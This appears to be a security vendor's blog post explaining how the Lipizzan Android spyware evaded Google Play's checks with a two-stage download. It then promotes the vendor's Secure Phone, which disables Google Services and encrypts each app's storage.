At the end of last month, Google announced it had blocked a new family of malware that had spread through its Play Store. Dubbed Lipizzan, the malicious code wasn’t spectacular in terms of spying capabilities. The part that has bigger implications for mobile security is how it got through Google’s filters in the first place.

The Lipizzan malware found its way on the Google Play store in a rather inventive way.

According to Google, the Lipizzan spyware could read all kinds of data stored on the infected device and redistribute to third parties. This included email and text messages, location data, voice calls, and stored media files. Reportedly, there were 20 apps with the code detected in the store and fewer than 100 devices affected in total. These numbers are a drop in the ocean of Google Play’s 3 million available apps and over 3 billion users. However, this is not too reassuring.

How did this malware get on Google Play?

The problem here is that one assumes there is no malware on Google’s official store. The store’s security measures include an old school firewall, as well as a new-breed self-learning AI that finds malicious patterns faster than any developer can hard-code. There just shouldn’t be harmful apps in that store. It is usually downloading from third-party stores that gets you infected.

To dodge this type of security, Lipizzan used what cybersecurity experts call a “classic” move. The code, allegedly linked to Israeli cyberarms company Equus Technologies, split its malicious behavior into a second-stage component. Here is how that worked:

  • In the first stage, the apps uploaded to Google Play and then downloaded on the user device featured no malicious code. This is how they got through Google’s Bouncer.
  • Then in the second stage, the apps would download a “license verification” which would contain the malicious code. Once downloaded, it would scan the device and root it with known exploits.

Should you be worried about Lipizzan?

To their credit, Google did detect the malware quickly enough. They also purged it from the store and infected devices for good. So, if you are worried about this particular strain of malware – well, you shouldn’t be. The worrisome part is that the whole story shows official app stores, despite companies’ best security efforts, are still susceptible to infiltration by malicious apps.

This only goes to reaffirm our view that secure mobile communication solutions should take into account the following:

  • Google Services, including the app store, are not for those concerned about privacy and security. If you have sensitive information on your device, you should close as many access points to it as possible. This is why for Secure Phone, we have resorted to disabling Internet browsing and Google Services altogether.
  • You can’t count on external protection against malware – new breeds of it will eventually find cracks into any security setup. Because of that, you have to make sure that even if malicious code infects the device, it wouldn’t be able to exploit the data on it.

To that end, we have modified the Android app Content Provider to each app can access only its own APK. We have also designed each app to store data only within itself, in encrypted form. For example, a picture sent to your phone via Secure Chat will be stored only within that app. Since the app storage is also encrypted, no malware installed on the device will be able to gain access to that picture.